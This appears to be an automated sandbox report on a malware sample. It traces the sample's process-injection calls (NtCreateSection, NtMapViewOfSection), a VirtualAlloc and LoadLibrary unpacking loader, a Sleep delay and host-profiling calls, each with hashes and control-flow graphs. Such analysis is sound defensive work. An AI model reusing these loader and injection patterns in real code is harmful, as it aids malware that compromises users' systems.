                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1968288336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_jssrvvh.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                                        • Instruction ID: 248f23169df6d57de1173162bb8fcbefd5e68f0f1e7bb912041edb2cf68793e3
                                                                        • Opcode Fuzzy Hash: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                                        • Instruction Fuzzy Hash: 11512AB0900245BFEB208F91CC48FAFBBB8FF85B00F14016AF911BA2E5D6759941CB24
                                                                        Function 00401658 Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 336 401658-401670 call 4012a9 340 401672 336->340 341 401675-40167a 336->341 340->341 343 401680-401691 341->343 344 401991-401999 341->344 348 401697-4016c0 343->348 349 40198f 343->349 344->341 347 40199e-4019e0 call 4012a9 344->347 348->349 357 4016c6-4016dd NtDuplicateObject 348->357 349->347 357->349 358 4016e3-401707 NtCreateSection 357->358 360 401763-401789 NtCreateSection 358->360 361 401709-40172a NtMapViewOfSection 358->361 360->349 365 40178f-401793 360->365 361->360 363 40172c-401748 NtMapViewOfSection 361->363 363->360 366 40174a-401760 363->366 365->349 368 401799-4017ba NtMapViewOfSection 365->368 366->360 368->349 370 4017c0-4017dc NtMapViewOfSection 368->370 370->349 373 4017e2 call 4017e7 370->373
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1968288336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_jssrvvh.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                                        • Instruction ID: 4b61e56e2161a851a120027933825f601e9725a76b72e0f731e8dd48e05b5e19
                                                                        • Opcode Fuzzy Hash: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                                        • Instruction Fuzzy Hash: FC51F7B5900249BFEF209F91CC88FAFBBB9FF85B10F100159F911AA2A5D6749944CB24
                                                                        Function 02D9003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 2d9003c-2d90047 1 2d90049 0->1 2 2d9004c-2d90263 call 2d90a3f call 2d90e0f call 2d90d90 VirtualAlloc 0->2 1->2 17 2d9028b-2d90292 2->17 18 2d90265-2d90289 call 2d90a69 2->18 20 2d902a1-2d902b0 17->20 22 2d902ce-2d903c2 VirtualProtect call 2d90cce call 2d90ce7 18->22 20->22 23 2d902b2-2d902cc 20->23 29 2d903d1-2d903e0 22->29 23->20 30 2d90439-2d904b8 VirtualFree 29->30 31 2d903e2-2d90437 call 2d90ce7 29->31 33 2d904be-2d904cd 30->33 34 2d905f4-2d905fe 30->34 31->29 36 2d904d3-2d904dd 33->36 37 2d9077f-2d90789 34->37 38 2d90604-2d9060d 34->38 36->34 40 2d904e3-2d90505 36->40 41 2d9078b-2d907a3 37->41 42 2d907a6-2d907b0 37->42 38->37 43 2d90613-2d90637 38->43 52 2d90517-2d90520 40->52 53 2d90507-2d90515 40->53 41->42 44 2d9086e-2d908be LoadLibraryA 42->44 45 2d907b6-2d907cb 42->45 46 2d9063e-2d90648 43->46 51 2d908c7-2d908f9 44->51 48 2d907d2-2d907d5 45->48 46->37 49 2d9064e-2d9065a 46->49 54 2d90824-2d90833 48->54 55 2d907d7-2d907e0 48->55 49->37 50 2d90660-2d9066a 49->50 56 2d9067a-2d90689 50->56 58 2d908fb-2d90901 51->58 59 2d90902-2d9091d 51->59 60 2d90526-2d90547 52->60 53->60 57 2d90839-2d9083c 54->57 61 2d907e2 55->61 62 2d907e4-2d90822 55->62 63 2d9068f-2d906b2 56->63 64 2d90750-2d9077a 56->64 57->44 65 2d9083e-2d90847 57->65 58->59 66 2d9054d-2d90550 60->66 61->54 62->48 69 2d906ef-2d906fc 63->69 70 2d906b4-2d906ed 63->70 64->46 71 2d90849 65->71 72 2d9084b-2d9086c 65->72 67 2d905e0-2d905ef 66->67 68 2d90556-2d9056b 66->68 67->36 74 2d9056d 68->74 75 2d9056f-2d9057a 68->75 76 2d9074b 69->76 77 2d906fe-2d90748 69->77 70->69 71->44 72->57 74->67 78 2d9059b-2d905bb 75->78 79 2d9057c-2d90599 75->79 76->56 77->76 84 2d905bd-2d905db 78->84 79->84 84->66
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02D9024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969542787.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2d90000_jssrvvh.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 19c608a10c3f047ae6230d16906b32d707d0f14c61c47ef9a3938d3e8988d833
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: 3C525874A01229DFDB64CF68D984BA8BBB1BF09315F1480D9E94DAB351DB30AE85CF14
                                                                        Function 02E51B38 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 375 2e51b38-2e51b51 376 2e51b53-2e51b55 375->376 377 2e51b57 376->377 378 2e51b5c-2e51b68 CreateToolhelp32Snapshot 376->378 377->378 379 2e51b78-2e51b85 Module32First 378->379 380 2e51b6a-2e51b70 378->380 381 2e51b87-2e51b88 call 2e517f7 379->381 382 2e51b8e-2e51b96 379->382 380->379 385 2e51b72-2e51b76 380->385 386 2e51b8d 381->386 385->376 385->379 386->382
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E51B60
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 02E51B80
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969684642.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E4B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2e4b000_jssrvvh.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: 6343ac5e0d2207258acabafb7968628a8b8caed9503fb763fb36f0c8e1a894f8
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: 15F0FC31550B24ABD7203BFC9C9CF6F76ECAF45728F105528EA46950C0EB70E8454661
                                                                        Function 02D90E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 388 2d90e0f-2d90e24 SetErrorMode * 2 389 2d90e2b-2d90e2c 388->389 390 2d90e26 388->390 390->389
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02D90223,?,?), ref: 02D90E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02D90223,?,?), ref: 02D90E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969542787.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2d90000_jssrvvh.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: 89d7fe53a4739ae435d3ec7ad4b23bed7c1142db86f615a5dd78f8ce4d487e67
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: D6D0123514512877DB002A94DC09BCD7B1CDF05B67F008011FB0DD9180C770994046E5
                                                                        Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 90sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 391 401a01-401a48 call 4012a9 Sleep call 401524 401 401a57-401aa7 call 4012a9 391->401 402 401a4a-401a52 call 401615 391->402 402->401
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1968288336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_jssrvvh.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                        • String ID:
                                                                        • API String ID: 4152845823-0
                                                                        • Opcode ID: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                                        • Instruction ID: 81c5b6d8da752c85ef5c48e217346158da0f95f2e0f30d6723e854e1366495a5
                                                                        • Opcode Fuzzy Hash: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                                        • Instruction Fuzzy Hash: AE21383234E201EBDB009B90AD419BA3315AB85714F34467BF5137A1F2C63E99436F6B
                                                                        Function 004019E3 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 416 4019e3-401a48 call 4012a9 Sleep call 401524 431 401a57-401aa7 call 4012a9 416->431 432 401a4a-401a52 call 401615 416->432 432->431
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1968288336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_jssrvvh.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                        • String ID:
                                                                        • API String ID: 4152845823-0
                                                                        • Opcode ID: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                                        • Instruction ID: 3d34462ae554e6b9c52ec10bfc335e1d4eef14cf0cc07287d36856a9453ce069
                                                                        • Opcode Fuzzy Hash: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                                        • Instruction Fuzzy Hash: AA11E17274A205FBDB00AA949C41EBA3228AB45714F308577BA43780F1D57D8953BF6F
                                                                        Function 004019EE Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 446 4019ee-401a48 call 4012a9 Sleep call 401524 459 401a57-401aa7 call 4012a9 446->459 460 401a4a-401a52 call 401615 446->460 460->459
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1968288336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_jssrvvh.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                        • String ID:
                                                                        • API String ID: 4152845823-0
                                                                        • Opcode ID: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                                        • Instruction ID: fd11faa5c1113836d14621795cf3d83bd65fd701f71c993b701afff5049cc75c
                                                                        • Opcode Fuzzy Hash: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                                        • Instruction Fuzzy Hash: 27018B3274A201EBDB009A949C42ABA3728AF45714F2045B7BA43B90F1C67D99536F2B
                                                                        Function 004019FA Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 474 4019fa-401a48 call 4012a9 Sleep call 401524 489 401a57-401aa7 call 4012a9 474->489 490 401a4a-401a52 call 401615 474->490 490->489
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1968288336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_jssrvvh.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                        • String ID:
                                                                        • API String ID: 4152845823-0
                                                                        • Opcode ID: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                                        • Instruction ID: 6cc9081dd0b90bd572a9145dab600ca03ca16d67528742debddf3dc55f5ee8c1
                                                                        • Opcode Fuzzy Hash: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                                        • Instruction Fuzzy Hash: 1A01C03274A105EBDB009A949C41EBA3328AB44710F308577BA43790F1C57D8A537F6F
                                                                        Function 00401A09 Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 504 401a09-401a48 call 4012a9 Sleep call 401524 513 401a57-401aa7 call 4012a9 504->513 514 401a4a-401a52 call 401615 504->514 514->513
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1968288336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_jssrvvh.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                        • String ID:
                                                                        • API String ID: 4152845823-0
                                                                        • Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                                        • Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
                                                                        • Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                                        • Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B
                                                                        Function 00401A10 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 528 401a10-401a48 call 4012a9 Sleep call 401524 534 401a57-401aa7 call 4012a9 528->534 535 401a4a-401a52 call 401615 528->535 535->534
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1968288336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_jssrvvh.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                        • String ID:
                                                                        • API String ID: 4152845823-0
                                                                        • Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                                        • Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
                                                                        • Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                                        • Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B
                                                                        Function 02E517F7 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02E51848
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969684642.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E4B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2e4b000_jssrvvh.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: b5e312ec4d30e23907c97770bfd62c1e98a090b7494b63cb8647a8de6eb35854
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: AE113979A40208EFDB01DF98C985E98BBF5AF08351F05C0A4FA489B361D375EA90DF80

                                                                        Execution Graph

                                                                        Execution Coverage:8%
                                                                        Dynamic/Decrypted Code Coverage:35.8%
                                                                        Signature Coverage:6.8%
                                                                        Total number of Nodes:310
                                                                        Total number of Limit Nodes:10
                                                                        execution_graph 21999 412e44 22000 412e4d 21999->22000 22001 412e57 22000->22001 22003 409960 22000->22003 22004 409975 22003->22004 22008 4099c7 22003->22008 22009 4336f0 22004->22009 22006 409a3b 22007 435440 RtlAllocateHeap 22006->22007 22007->22008 22008->22001 22010 43376b 22009->22010 22011 4337a8 RtlExpandEnvironmentStrings 22009->22011 22010->22011 22012 41b544 22013 41b552 22012->22013 22019 435440 22013->22019 22015 41b55c 22022 41f960 22015->22022 22026 41bd00 22015->22026 22016 41b5c6 22020 4354d0 RtlAllocateHeap 22019->22020 22021 43549d 22019->22021 22020->22015 22021->22020 22023 41f979 22022->22023 22025 41fae0 22022->22025 22024 435440 RtlAllocateHeap 22023->22024 22024->22025 22025->22016 22027 41bd16 22026->22027 22037 41bdc0 22026->22037 22028 435440 RtlAllocateHeap 22027->22028 22027->22037 22029 41be27 22028->22029 22029->22029 22044 43a060 22029->22044 22031 41be9d 22032 41beda 22031->22032 22035 43a060 2 API calls 22031->22035 22031->22037 22033 435440 RtlAllocateHeap 22032->22033 22032->22037 22034 41beea 22033->22034 22050 43a530 22034->22050 22035->22032 22037->22016 22038 41befc 22039 435440 RtlAllocateHeap 22038->22039 22040 41bf66 22038->22040 22042 41bf78 22039->22042 22040->22037 22057 4373e0 LdrInitializeThunk 22040->22057 22042->22042 22056 408f90 RtlAllocateHeap 22042->22056 22045 43a080 22044->22045 22046 435440 RtlAllocateHeap 22045->22046 22048 43a0b5 22046->22048 22047 43a1fe 22047->22031 22048->22047 22058 4373e0 LdrInitializeThunk 22048->22058 22051 43a575 22050->22051 22054 43a5ee 22051->22054 22059 4373e0 LdrInitializeThunk 22051->22059 22052 43a6ce 22052->22038 22054->22052 22060 4373e0 LdrInitializeThunk 22054->22060 22056->22040 22057->22037 22058->22047 22059->22054 22060->22052 22252 436d86 22253 436da7 22252->22253 22254 436e6f LoadLibraryW 22253->22254 22255 436e76 22254->22255 22256 414c84 22257 414cd0 22256->22257 22258 435440 RtlAllocateHeap 22257->22258 22259 414d2a 22258->22259 22259->22259 22260 43a060 2 API calls 22259->22260 22261 414d9e 22260->22261 22262 40d20b 22263 40d210 22262->22263 22264 435440 RtlAllocateHeap 22263->22264 22265 40d233 22264->22265 22061 41184c 22062 411855 22061->22062 22067 414ec0 22062->22067 22064 41186c 22065 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22064->22065 22066 411876 22065->22066 22068 414ee0 22067->22068 22068->22068 22069 414eeb RtlExpandEnvironmentStrings 22068->22069 22070 414f08 22069->22070 22071 435440 RtlAllocateHeap 22070->22071 22072 414f18 RtlExpandEnvironmentStrings 22071->22072 22073 414fa1 22072->22073 22074 435440 RtlAllocateHeap 22073->22074 22076 415056 22074->22076 22075 43a060 2 API calls 22077 4150ca 22075->22077 22076->22075 22076->22076 22266 42880f 22267 428816 22266->22267 22268 4336f0 RtlExpandEnvironmentStrings 22267->22268 22269 4288ea 22268->22269 22270 428934 GetPhysicallyInstalledSystemMemory 22269->22270 22271 428959 22270->22271 22271->22271 22272 412c8c 22273 412c90 22272->22273 22273->22273 22274 435440 RtlAllocateHeap 22273->22274 22275 412cba 22274->22275 22078 43724d 22079 437295 22078->22079 22080 4372df RtlReAllocateHeap 22078->22080 22079->22080 22081 4373a0 22080->22081 22082 427353 22085 42735d 22082->22085 22083 427de0 GetComputerNameExA 22083->22085 22084 427efb GetComputerNameExA 22084->22085 22085->22083 22085->22084 22086 413ed3 22091 42ec90 22086->22091 22088 413ee0 22089 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22088->22089 22090 413efc 22089->22090 22092 42ecc7 KiUserCallbackDispatcher GetSystemMetrics 22091->22092 22093 42ed10 DeleteObject 22092->22093 22095 42ed7e SelectObject 22093->22095 22097 42ee29 SelectObject 22095->22097 22098 42ee55 DeleteObject 22097->22098 22276 416193 22277 4161ee 22276->22277 22280 4373e0 LdrInitializeThunk 22277->22280 22279 41628c 22280->22279 22281 425e97 22282 425e63 22281->22282 22282->22281 22283 42605e 22282->22283 22285 4373e0 LdrInitializeThunk 22282->22285 22285->22283 22291 412198 22292 4121a1 22291->22292 22297 417a30 22292->22297 22294 4121b9 22295 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22294->22295 22296 4121c3 22295->22296 22298 417a50 22297->22298 22298->22298 22299 417a5b RtlExpandEnvironmentStrings 22298->22299 22300 417a78 22299->22300 22301 435440 RtlAllocateHeap 22300->22301 22302 417a88 RtlExpandEnvironmentStrings 22301->22302 22303 43a250 2 API calls 22302->22303 22304 417aa9 22303->22304 22111 415cdd 22112 415cf1 22111->22112 22113 435440 RtlAllocateHeap 22112->22113 22114 415d30 22113->22114 22115 435440 RtlAllocateHeap 22114->22115 22116 415de3 22115->22116 22116->22116 22119 43a250 22116->22119 22118 415e51 22120 43a270 22119->22120 22121 435440 RtlAllocateHeap 22120->22121 22122 43a2a0 22121->22122 22122->22122 22123 43a3ce 22122->22123 22125 4373e0 LdrInitializeThunk 22122->22125 22123->22118 22125->22123 22315 414a9f 22316 435440 RtlAllocateHeap 22315->22316 22317 414aa7 22316->22317 22318 43a530 LdrInitializeThunk 22317->22318 22319 414abe 22318->22319 22320 408ea0 22321 408eab 22320->22321 22323 408ebc GetStdHandle GetConsoleWindow 22321->22323 22324 408eaf 22321->22324 22322 408f0b ExitProcess 22323->22324 22324->22322 22132 416460 22135 4174d0 22132->22135 22136 417599 22135->22136 22137 435440 RtlAllocateHeap 22136->22137 22138 417665 22137->22138 22139 435440 RtlAllocateHeap 22138->22139 22140 417862 22139->22140 22141 41ede3 22142 41edf3 22141->22142 22143 41ee02 22141->22143 22142->22143 22147 43a900 22142->22147 22151 43b050 RtlAllocateHeap LdrInitializeThunk 22143->22151 22146 41eeb7 22146->22146 22149 43a920 22147->22149 22148 43aa1e 22148->22143 22149->22148 22152 4373e0 LdrInitializeThunk 22149->22152 22151->22146 22152->22148 22153 414966 22154 4149af 22153->22154 22156 414a0e 22154->22156 22157 4373e0 LdrInitializeThunk 22154->22157 22157->22156 22325 433ca4 22326 43a060 2 API calls 22325->22326 22327 433cb9 22326->22327 22328 43a060 2 API calls 22327->22328 22329 433cfe 22328->22329 22158 42b5e8 22159 42b6f6 22158->22159 22160 42b72c SysAllocString 22158->22160 22159->22160 22161 42b79e 22160->22161 22330 56003c 22331 560049 22330->22331 22332 56004c 22330->22332 22346 560e0f SetErrorMode SetErrorMode 22332->22346 22337 560265 22338 5602ce VirtualProtect 22337->22338 22340 56030b 22338->22340 22339 560439 VirtualFree 22343 5604be 22339->22343 22344 5605f4 LoadLibraryA 22339->22344 22340->22339 22341 5604e3 LoadLibraryA 22341->22343 22343->22341 22343->22344 22345 5608c7 22344->22345 22347 560223 22346->22347 22348 560d90 22347->22348 22349 560dad 22348->22349 22350 560dbb GetPEB 22349->22350 22351 560238 VirtualAlloc 22349->22351 22350->22351 22351->22337 22352 417b2d 22353 417b8b 22352->22353 22354 41a800 2 API calls 22353->22354 22355 417bcc 22354->22355 22166 41c0f0 22167 41c0fc 22166->22167 22171 41c150 22166->22171 22168 435440 RtlAllocateHeap 22167->22168 22169 41c164 22168->22169 22170 435440 RtlAllocateHeap 22169->22170 22170->22171 22356 419db0 22357 419dbe 22356->22357 22361 419e00 22356->22361 22358 435440 RtlAllocateHeap 22357->22358 22360 419e14 22358->22360 22360->22360 22362 419ec0 22360->22362 22363 419f2d 22362->22363 22364 435440 RtlAllocateHeap 22363->22364 22366 419fb2 22364->22366 22365 43a250 2 API calls 22367 41a01d 22365->22367 22366->22365 22366->22366 22172 41baf3 22173 435440 RtlAllocateHeap 22172->22173 22174 41bb0a 22173->22174 22179 413cf5 22180 413d05 22179->22180 22207 41cfa0 22180->22207 22182 413d0b 22183 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22182->22183 22184 413d15 22183->22184 22185 41d8e0 6 API calls 22184->22185 22186 413d28 22185->22186 22187 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22186->22187 22188 413d32 22187->22188 22189 41db10 LdrInitializeThunk 22188->22189 22190 413d48 22189->22190 22191 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22190->22191 22192 413d52 22191->22192 22193 41fd10 